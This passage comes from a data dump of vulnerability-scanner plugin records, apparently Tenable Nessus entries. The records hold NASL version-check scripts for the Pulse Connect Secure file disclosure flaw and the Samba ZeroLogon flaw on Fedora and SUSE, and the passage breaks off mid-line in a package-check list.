8.2R12.1, 8.3R7.1, 9.0R3.4, or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11510\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Pulse Connect Secure File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pulsesecure:pulse_connect_secure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pulse_connect_secure_detect.nbin\");\n script_require_keys(\"installed_sw/Pulse Connect Secure\");\n script_require_ports(443);\n\n exit(0);\n}\n\n# Deprecated\nexit(0, 'This plugin has been deprecated. Use pulse_connect_secure-sa-44101.nasl (plugin ID 124766) instead.');\n\ninclude('vcf.inc');\n\napp_info = vcf::get_app_info(app:'Pulse Connect Secure', port:443, webapp:TRUE);\n\nconstraints = [\n {'fixed_version' : '8.1R15.1'},\n {'min_version' : '8.2' , 'fixed_version' : '8.2R12.1'},\n {'min_version' : '8.3' , 'fixed_version' : '8.3R7.1'},\n {'min_version' : '9.0' , 'fixed_version' : '9.0R3.4'},\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:23:36", "description": "Security fixes for CVE-2020-1472\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-10-05T00:00:00", "type": "nessus", "title": "Fedora 31 : 2:samba (2020-a1d139381a)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-24T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:31", "p-cpe:/a:fedoraproject:fedora:2:samba"], "id": "FEDORA_2020-A1D139381A.NASL", "href": "https://www.tenable.com/plugins/nessus/141144", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-a1d139381a.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141144);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/24\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"FEDORA\", value:\"2020-a1d139381a\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"Fedora 31 : 2:samba (2020-a1d139381a)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Security fixes for CVE-2020-1472\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-a1d139381a\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected 2:samba package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:2:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:31\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^31([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 31\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC31\", reference:\"samba-4.11.13-0.fc31\", epoch:\"2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"2:samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:23:58", "description": "Update to Samba 4.13.0\n\n----\n\nSecurity fixes for CVE-2020-1472\n\n----\n\nUpdate to Samba 4.13.0rc4\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-10-08T00:00:00", "type": "nessus", "title": "Fedora 33 : 2:samba (2020-77c15664b0)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-24T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:33", "p-cpe:/a:fedoraproject:fedora:2:samba"], "id": "FEDORA_2020-77C15664B0.NASL", "href": "https://www.tenable.com/plugins/nessus/141273", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-77c15664b0.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141273);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/24\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"FEDORA\", value:\"2020-77c15664b0\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"Fedora 33 : 2:samba (2020-77c15664b0)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to Samba 4.13.0\n\n----\n\nSecurity fixes for CVE-2020-1472\n\n----\n\nUpdate to Samba 4.13.0rc4\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-77c15664b0\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected 2:samba package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:2:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:33\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^33([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 33\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC33\", reference:\"samba-4.13.0-11.fc33\", epoch:\"2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"2:samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:28:12", "description": "This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : samba (SUSE-SU-2020:2724-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libdcerpc-binding0", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc0", "p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt0", "p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard0", "p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0", "p-cpe:/a:novell:suse_linux:libndr0-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0", "p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials0", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors0", "p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-passdb0", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-util0", "p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamdb0", "p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient0", "p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf0", "p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap0", "p-cpe:/a:novell:suse_linux:libsmbldap0-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util0", "p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient0", "p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:samba", "p-cpe:/a:novell:suse_linux:samba-client", "p-cpe:/a:novell:suse_linux:samba-client-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debugsource", "p-cpe:/a:novell:suse_linux:samba-libs", "p-cpe:/a:novell:suse_linux:samba-libs-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind", "p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2020-2724-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143807", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2724-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143807);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"SUSE SLES12 Security Update : samba (SUSE-SU-2020:2724-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some\nconfigurations when an attacker established a vulnerable Netlogon\nsecure channel connection to a domain controller, using the Netlogon\nRemote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-1472/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202724-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5a60bae9\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-7-2020-2724=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP2-2020-2724=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-2020-2724=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2020-2724=1\n\nSUSE Linux Enterprise High Availability 12-SP2 :\n\nzypper in -t patch SUSE-SLE-HA-12-SP2-2020-2724=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc-binding0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc-binding0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc-binding0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-krb5pac0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-krb5pac0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-krb5pac0-debuginfo-4.4.2-38.36.1\")) flag++;\nif 